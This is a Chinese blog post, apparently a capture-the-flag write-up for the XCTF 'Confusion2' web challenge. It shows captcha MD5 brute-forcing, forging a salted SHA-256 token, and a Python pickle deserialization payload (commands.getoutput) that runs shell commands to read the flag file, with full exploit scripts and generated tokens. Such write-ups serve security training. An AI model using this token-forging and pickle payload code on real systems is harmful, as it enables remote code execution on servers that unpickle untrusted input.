[网络安全] [MCollider] XCTF Confusion2 靶场详解 难度:10星

已于 2023-04-19 16:46:20 修改
阅读量187 收藏
点赞数
文章标签: web安全 python github
于 2023-04-19 16:41:16 首次发布
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/130209005
版权

Github==>https://github.com/MartinxMax/

题目描述

Alice终于写完了他的网站, 当Alice和我说的时候,我发现有些奇怪的地方.
PS: Alice 说当她cooking的时候喜欢加salts。
hint1. sign = alg(header + payload + SALT).
hint2. Find SALT before Alice finished it.

0X01 说明

靶场首页
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述可以发现Login,Register页面都存在一个验证码
substr(md5('验证码'),0,6) === 'a2d491'
其中含义是将验证码进行md5加密,再取前六位,如果等于a2d491那么就验证成功

0X02 MCollider爆破验证码

MCollider下载:https://github.com/MartinxMax/MCollider
MCollider使用手册:http://t.csdn.cn/C0JY5

爆破注册用户页面验证码

#python3 MCollider.py -md5 3a8cd9

在这里插入图片描述
在这里插入图片描述

爆破登录用户页面验证码

#python3 MCollider.py -md5 68c24a

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0X03 BP抓包

在这里插入图片描述

在这里插入图片描述header:
{
“typ”: “JWT”,
“alg”: “sha256”,
“kid”: “1”
}
Payload:
{
“data”: “O:4:“User”:2:{s:9:“user_data”;s:57:”(lp1\nVadmin\np2\naS’21232f297a57a5a743894a0e4a801fc3’\np3\na.“;}”
}

这里哪里存在漏洞呢?
答案是这里:
(lp1\nVadmin\np2\naS’21232f297a57a5a743894a0e4a801fc3’\np3\na.

这里千万别被迷惑了!!!
在这里插入图片描述
这里加入反斜杠因为这个python所需要处理的!也就是说再最后生成的时候必须加上\
{'DATA':"{Python所需要处理内容}"}

0x04 分析漏洞点

这个lp1到底是什么?
明显是cPickle包生成的反序列化字符串,不过我们这里可以不用cPickle构造Payload
(lp1\nVadmin\np2\naS’21232f297a57a5a743894a0e4a801fc3’\np3\na.
lp1\nVadmin\np2\na:部分表示一个列表,有元素 'admin'
S’21232f297a57a5a743894a0e4a801fc3’\n:列表中第二个元素
p3\na.:这是一个特殊标记,指示已经完成了序列化

抽象解释
{ "data": "O:4:\"User\":2:{s:9:\"user_data\";s:59:\"[列表,表中两个元素]\";}" }
重点:列表中有两个元素

0x05 构造LS命令PAYLOAD

官方WP中用到的是cPickle包,我们也可以使用pickle包
cPickle是Python标准库中pickle模块的C语言实现版本,它比pickle快得多。在Python 3.x中,cPickle已经被移除了,取而代之的是对pickle模块进行深度优化的重构,因此在Python 3.x中不需要直接使用cPickle。但在Python 2.x中,如果你对性能有要求,那么可以考虑使用cPickle来代替pickle

接下来我们将构造这里的Payload
在这里插入图片描述

import pickle
import commands
import json

class hack(object):
    def __reduce__(self):
        return (commands.getoutput, ('ls', ))

payload = pickle.dumps([hack(),hack()])
data = json.dumps('O:4:"User":2:{s:9:"user_data";s:%d:"%s";}' % (len(payload), payload))[1:-1]

print '{"data":"%s"}' %( data )
# 注意结果需要BASE64编码!
# 结果 {"data":"O:4:\"User\":2:{s:9:\"user_data\";s:59:\"(lp0\nccommands\ngetoutput\np1\n(S'ls'\np2\ntp3\nRp4\nag1\ng3\nRp5\na.\";}"}
# BASE64:eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTk6XCIobHAwXG5jY29tbWFuZHNcbmdldG91dHB1dFxucDFcbihTJ2xzJ1xucDJcbnRwM1xuUnA0XG5hZzFcbmczXG5ScDVcbmEuXCI7fSJ9

0001 LS命令PAYLOAD编码后

eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTk6XCIobHAwXG5jY29tbWFuZHNcbmdldG91dHB1dFxucDFcbihTJ2xzJ1xucDJcbnRwM1xuUnA0XG5hZzFcbmczXG5ScDVcbmEuXCI7fSJ9

0x05 签名是什么?

Confusion2是Confusion1的续版,所以这个盐你必须在Confusion1中找
盐:_Y0uW1llN3verKn0w1t_
在这里插入图片描述根据提示(这里头和Payload应该是base64形式存在的):
签名=头+"."+Payload+盐

import hashlib

def Get_sign(header,payload,salt):
    return hashlib.sha256(header+'.'+payload+salt).hexdigest()

print Get_sign('eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0',
               'eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTk6XCIobHAwXG5jY29tbWFuZHNcbmdldG91dHB1dFxucDFcbihTJ2xzJ1xucDJcbnRwM1xuUnA0XG5hZzFcbmczXG5ScDVcbmEuXCI7fSJ9',
               '_Y0uW1llN3verKn0w1t_')
# 把0001中LS命令PAYLOAD编码后的值拖到第二个参数里
# 签名结果:08a2ca6809f0c91db71a0bb56444274680b52a64ea9917f2592c9e4d39997a40
#BASE64:MDhhMmNhNjgwOWYwYzkxZGI3MWEwYmI1NjQ0NDI3NDY4MGI1MmE2NGVhOTkxN2YyNTkyYzllNGQzOTk5N2E0MA

在这里插入图片描述

0002 加盐签名构造编码后

MDhhMmNhNjgwOWYwYzkxZGI3MWEwYmI1NjQ0NDI3NDY4MGI1MmE2NGVhOTkxN2YyNTkyYzllNGQzOTk5N2E0MA

0x06 拼接PAYLOAD并且验证是否有效

拼接0001和0002的结果
eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0.eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTk6XCIobHAwXG5jY29tbWFuZHNcbmdldG91dHB1dFxucDFcbihTJ2xzJ1xucDJcbnRwM1xuUnA0XG5hZzFcbmczXG5ScDVcbmEuXCI7fSJ9.MDhhMmNhNjgwOWYwYzkxZGI3MWEwYmI1NjQ0NDI3NDY4MGI1MmE2NGVhOTkxN2YyNTkyYzllNGQzOTk5N2E0MA

在这里插入图片描述BP替换Token成功执行代码
在这里插入图片描述

0x07 获取Flag

根据提示Flag在opt目录下,整理代码

# @ Martin
import pickle
import commands
import json
import hashlib
import base64

CMD = 'ls /opt'

def Get_sign(header,payload,salt):
    return hashlib.sha256(header+'.'+payload+salt).hexdigest()

def base64_url_encode(text):
    return base64.b64encode(text).replace('+', '-').replace('/', '_').replace('=', '')

class hack(object):
    def __reduce__(self):
        return (commands.getoutput, (CMD, ))

salt='_Y0uW1llN3verKn0w1t_'
header = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0' # base64
payload = pickle.dumps([hack(),hack()])
payload_data = json.dumps('O:4:"User":2:{s:9:"user_data";s:%d:"%s";}' % (len(payload), payload))[1:-1]
payload = base64_url_encode('{"data":"%s"}' %( payload_data )) # base64
signature = base64_url_encode(Get_sign(header,payload,salt)) # base64
print header+'.'+payload+'.'+signature

在这里插入图片描述

在这里插入图片描述
将参数修改:CMD = 'tac /opt/flag_73ee7fd6c242606c7a5a3950b196d92a.txt'

在这里插入图片描述eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0.eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6MTEyOlwiKGxwMFxuY2NvbW1hbmRzXG5nZXRvdXRwdXRcbnAxXG4oUyd0YWMgL29wdC9mbGFnXzczZWU3ZmQ2YzI0MjYwNmM3YTVhMzk1MGIxOTZkOTJhLnR4dCdcbnAyXG50cDNcblJwNFxuYWcxXG4oZzJcbnRwNVxuUnA2XG5hLlwiO30ifQ.OGM1YThjYmIzNGViOGY1OTQ3NTNhMjg3YTc0ZmU2MzBhNzQ1N2ViYjRmMzhhYWJkZjM2MzAwNzA0YjE4NDU0MA

在这里插入图片描述
cyberpeace{af531b04b1278f7f2b7391b3f6c63ec1}

0x08 整个过程到底发生了什么?

看了我画的这个流程图你就明白了
在这里插入图片描述

0x08 总结

题目本身存在难度的,该题考了JWT和Python反序列化,其中分支就包含了python的经典类和新式类的知识点,官方给的WP资源少并且又过于难以理解,所以另一种方式刨析了一遍

Мартин.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
全!CTF靶场、渗透实战靶场总结 (适合收藏)
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
Unity3D中API常用方法和类详细讲解(Collider类、Collision 类、)
TAOTAO
05-21 2667
Collider类 点击这里进入官网 该类是所有碰撞器的基类。 See Also:BoxCollider,SphereCollider,CapsuleCollider,MeshCollider,PhysicMaterial,Rigidbody. 如果一个对象带有碰撞器,需要在游戏中移动,那么你应该添加个Rigidbody组件给它。如果你不想该对象与其他对象有物理交互,...
writeup:xctf撰写
03-28
写上去 xctf撰写
发掘网络安全新生力量 XCTF全国网络安全技术对抗联赛在京开启.pdf
09-20
发掘网络安全新生力量 XCTF全国网络安全技术对抗联赛在京开启.pdf
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes to generate exploit. exploit/exp_model.zip : injected LSTM model in TensorFlow saved_model format.
XCTF全国网络安全技术对抗赛决出前三甲 台湾大学夺冠.pdf
09-20
XCTF全国网络安全技术对抗赛决出前三甲 台湾大学夺冠.pdf
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个文件中包含了大部分程序逻辑 再使用AXMLPrinter2.jar对AndroidManifest.xml进行解包 2.分析文件 使用JD-GUI分析jar文件 找到MainActivity.clss,因为正常情况下MainActivity是app加载的第一个页面。 可以看到程序获取两个编辑框的内容,通过Intent机制调用S
[ 网络安全]MCollider (纯数字MD5爆破)工具
03-27 375
纯数字MD5爆破工具,支持模糊匹配。:所需要模糊爆破的md5值。
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 6727
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识球... ...
攻防世界--Confusion2
qq_46263951的博客
01-16 923
这个题是Confusion1的延续,所以根据题目提示,先在1中把salt文件内容先读出来 _Y0uW1llN3verKn0w1t_ 这里开放了register和login,注册并登陆 关于md5值爆破,我比较习惯使用数字来爆破,效率比较高一下 <?php $i=0; for ($i;$i<=9999999999999999;$i++) { if (substr(md5($i), 0, 6) == '7358dd') { echo($i); exi
XCTF靶场实战(1)
weixin_51339377的博客
03-29 1244
新手练习区 1 禁用js 2 robots.txt在网站根目录 里面可以规定搜索引擎看或者不看什么内容 3 xxxx.txt.bak index.phpsxxxx.rar.zip.7z.tar.gz.bak.txt.swp github www.xxx.com/.git/config 苹果电脑 .DS_Store 文件/目录泄露 svn文件泄露 subversion,开源代码控制系统 www.xxx.com/.svn/entires ...
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 16万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
Unity—物理引擎+“武器模块”
m0_63330263的博客
08-04 1091
目录 物理引擎 刚体Rigidbodyˈrɪdʒɪd/ 碰撞器collider/kəˈlaɪdə(r)/ 碰撞条件 碰撞三阶段 触发器 触发条件 触发三阶段 如果物体移动速度过快,碰撞检测失效—>解决方案: 开始时,使用射线检测 武器模块 枪 策划 需求分析 子弹 敌人子弹...
攻防世界 web高手进阶区 10分题Confusion2
闵行小鱼塘
10-13 1041
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Confusion2的writeup
CTF入门指南2-相关靶场平台
syh_486_007的专栏
08-15 4670
相关靶场平台:1、IDF实验室:http://ctf.idf.cn/2、实验吧公司产品:http://www.shiyanbar.com/3、四叶草安全 这个公司做web比较强:http://www.seclover.com/4、XCTF_OJ练习平台   XCTF-OJ (X Capture The Flag Online Judge)是由XCTF组委会组织开发并面向XCTF联赛参赛者提供的网络
适合新手的CTF靶场合集
zhy的博客
04-23 3万+
前言 我整理得没有那么全,这里的合集主要还是面对新手。做题贵精不在多,好好练习每一题,学习每个知识点,不懂的百度或者 Google 即可。记住,你是为了提高自己而去打 CTF 。 CTF 比赛时间表 CTFwiki(入门必看wiki): https://ctf-wiki.github.io/ctf-wiki/#/introduction XCTF社区: https://time.xctf....
2024电力网络安全事件应急预案
最新发布
goodxianping的专栏
06-16 265
一、总则\n\n(一)编制目的\n\n完善电力网络安全事件应对工作机制,有效预防、及时控制和最大限度消除电力网络安全事件带来的危害和影响,保障电力系统安全稳定运行和电力可靠供应。\n\n(三)适用范围\n\n本预案所指电力网络安全事件是指由计算机病毒或网络攻击、网络侵入等危害网络安全行为导致的,对电力网络和信息系统造成危害,可能影响电力系统安全稳定运行或者影响电力正常供应的事件。\n\n(五)事件分级\n\n根据电力网络安全事件造成停电等后果的影响程度,电力网络安全事件分为特别重大、重大、较大和一般四级。
网络安全等级保护基本要求 第1部分:安全通用要求
2403_84237550的博客
06-12 1998
b) 应通过系统管理员对系统的资源和运行进行配置、控制和管理,包括用户身份、系统资源配置、系统加载和启动、系统运行的异常处理、数据和设备的备份与恢复等。b) 应制定安全事件报告和处置管理制度,明确不同安全事件的报告、处置和响应流程,规定安全事件的现场处理、事件报告和后期恢复的管理职责等;b) 应建立配套设施、软硬件维护方面的管理制度,对其维护进行有效的管理,包括明确维护人员的责任、维修和服务的审批、维修过程的监督控制等。
xctf supersqli
09-01
CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值